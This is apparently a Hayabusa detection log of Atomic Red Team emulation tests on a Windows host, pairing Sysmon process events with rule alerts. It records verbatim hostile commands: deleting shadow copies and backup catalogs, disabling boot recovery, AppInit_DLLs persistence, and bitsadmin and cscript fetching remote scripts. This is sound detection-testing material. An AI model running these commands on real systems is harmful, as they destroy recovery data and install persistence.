+2019-07-19 23:47:37.127 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg"" | LID: 0x50951 | PID: 6056 | PGUID: 747F3D96-D809-5D31-0000-00105C262B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - AppInit | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs: C:\Tools\MessageBox64.dll,C:\Tools\MessageBox32.dll | Process: C:\Windows\system32\reg.exe | PID: 6056 | PGUID: 747F3D96-D809-5D31-0000-00105C262B00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,Persis,New DLL Added to AppInit_DLLs Registry Key,,rules/sigma/registry_event/sysmon_new_dll_added_to_appinit_dlls_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:37.168 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - via Windows Load | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs: DWORD (0x00000001) | Process: C:\Windows\system32\reg.exe | PID: 6056 | PGUID: 747F3D96-D809-5D31-0000-00105C262B00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:37.168 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:37.215 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 980 | PGUID: 747F3D96-D809-5D31-0000-001072292B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:40.691 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6896 | PGUID: 747F3D96-D80C-5D31-0000-0010223C2B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:40.706 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: vssadmin.exe delete shadows /all /quiet | Process: C:\Windows\System32\vssadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet"" | LID: 0x50951 | PID: 1124 | PGUID: 747F3D96-D80C-5D31-0000-0010843F2B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:40.706 +09:00,MSEDGEWIN10,1,critical,Evas | Impact,Shadow Copies Deletion Using Operating Systems Utilities,,rules/sigma/process_creation/proc_creation_win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:40.863 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1348 | PGUID: 747F3D96-D80C-5D31-0000-001005542B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:45.585 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog -quiet"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4500 | PGUID: 747F3D96-D811-5D31-0000-001000632B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:45.585 +09:00,MSEDGEWIN10,1,critical,LatMov | Disc | Evas | Impact,WannaCry Ransomware,,rules/sigma/process_creation/proc_creation_win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: wbadmin.exe delete catalog -quiet | Process: C:\Windows\System32\wbadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog -quiet"" | LID: 0x50951 | PID: 6160 | PGUID: 747F3D96-D811-5D31-0000-001061652B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,critical,Evas | Impact,Shadow Copies Deletion Using Operating Systems Utilities,,rules/sigma/process_creation/proc_creation_win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,critical,LatMov | Disc | Evas | Impact,WannaCry Ransomware,,rules/sigma/process_creation/proc_creation_win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:45.773 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wbengine.exe"" | Process: C:\Windows\System32\wbengine.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 6064 | PGUID: 747F3D96-D811-5D31-0000-0010726A2B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:45.958 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\vds.exe | Process: C:\Windows\System32\vds.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3184 | PGUID: 747F3D96-D811-5D31-0000-0010147C2B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:46.112 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2948 | PGUID: 747F3D96-D812-5D31-0000-0010AC892B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:46.302 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Schedule.Service Module Load | Image: C:\Windows\System32\taskschd.dll | Process: C:\Windows\System32\wbengine.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 6064 | PGUID: 747F3D96-D811-5D31-0000-0010726A2B00 | Hash: SHA1=BE65E71FC691867FFA1D3129CEAB67A0688A08CB,MD5=9A0C13D674AB2D72193653EF38D8FB8E,SHA256=15817A5CB717D4846AE753A27CD8859BCE63004143083027FA5EC9324DFC5188,IMPHASH=5694D579C32F1A7EB5FA54148C174C38",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:51.816 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6508 | PGUID: 747F3D96-D817-5D31-0000-001064AD2B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:51.865 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures | Process: C:\Windows\System32\bcdedit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"" | LID: 0x50951 | PID: 396 | PGUID: 747F3D96-D817-5D31-0000-001097B02B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:51.865 +09:00,MSEDGEWIN10,1,high,Impact,Modification of Boot Configuration,,rules/sigma/process_creation/proc_creation_win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:51.997 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled no"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6216 | PGUID: 747F3D96-D817-5D31-0000-001049B42B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:51.997 +09:00,MSEDGEWIN10,1,critical,LatMov | Disc | Evas | Impact,WannaCry Ransomware,,rules/sigma/process_creation/proc_creation_win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bcdedit.exe /set {default} recoveryenabled no | Process: C:\Windows\System32\bcdedit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled no"" | LID: 0x50951 | PID: 5984 | PGUID: 747F3D96-D817-5D31-0000-0010B7B62B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,critical,LatMov | Disc | Evas | Impact,WannaCry Ransomware,,rules/sigma/process_creation/proc_creation_win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,high,Impact,Modification of Boot Configuration,,rules/sigma/process_creation/proc_creation_win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:52.046 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7040 | PGUID: 747F3D96-D817-5D31-0000-0010C8BA2B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:57.227 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sdelete.exe C:\some\file.txt"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1632 | PGUID: 747F3D96-D81D-5D31-0000-0010B8CA2B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:57.274 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7080 | PGUID: 747F3D96-D81D-5D31-0000-0010D7CD2B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:04.103 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6736 | PGUID: 747F3D96-D824-5D31-0000-001023F42B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:04.131 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1 | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" | LID: 0x50951 | PID: 1540 | PGUID: 747F3D96-D824-5D31-0000-001075F62B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:04.131 +09:00,MSEDGEWIN10,1,medium,Evas | Persis,Bitsadmin Download,,rules/sigma/process_creation/proc_creation_win_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:05.365 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5808 | PGUID: 747F3D96-D825-5D31-0000-0010CF222C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:30.640 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D83E-5D31-0000-0010F0D02E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:30.660 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /create AtomicBITS | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS"" | LID: 0x50951 | PID: 4508 | PGUID: 747F3D96-D83E-5D31-0000-001042D32E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:30.799 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4036 | PGUID: 747F3D96-D83E-5D31-0000-0010A2D72E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:30.799 +09:00,MSEDGEWIN10,1,medium,Evas,Monitoring For Persistence Via BITS,,rules/sigma/process_creation/proc_creation_win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1 | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" | LID: 0x50951 | PID: 3732 | PGUID: 747F3D96-D83E-5D31-0000-0010AAD92E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,medium,Evas | Persis,Bitsadmin Download,,rules/sigma/process_creation/proc_creation_win_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,medium,Evas,Monitoring For Persistence Via BITS,,rules/sigma/process_creation/proc_creation_win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:30.900 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7072 | PGUID: 747F3D96-D83E-5D31-0000-001088DE2E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:30.917 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1 | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1"" | LID: 0x50951 | PID: 3204 | PGUID: 747F3D96-D83E-5D31-0000-0010DAE02E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:31.012 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4332 | PGUID: 747F3D96-D83E-5D31-0000-001046E52E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:31.041 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /complete AtomicBITS | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS"" | LID: 0x50951 | PID: 388 | PGUID: 747F3D96-D83F-5D31-0000-0010A2E72E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:31.134 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3760 | PGUID: 747F3D96-D83F-5D31-0000-001001EC2E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:31.157 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /resume AtomicBITS | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS"" | LID: 0x50951 | PID: 3704 | PGUID: 747F3D96-D83F-5D31-0000-001053EE2E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:31.240 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4888 | PGUID: 747F3D96-D83F-5D31-0000-00105EF22E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:36.834 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7140 | PGUID: 747F3D96-D844-5D31-0000-001075082F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:36.882 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct | LID: 0x50951 | PID: 2484 | PGUID: 747F3D96-D844-5D31-0000-0010C70A2F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:36.882 +09:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:37.264 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2624 | PGUID: 747F3D96-D845-5D31-0000-001098212F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:41.050 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2096 | PGUID: 747F3D96-D849-5D31-0000-0010914D2F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:41.050 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious Listing of Network Connections,,rules/sigma/process_creation/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
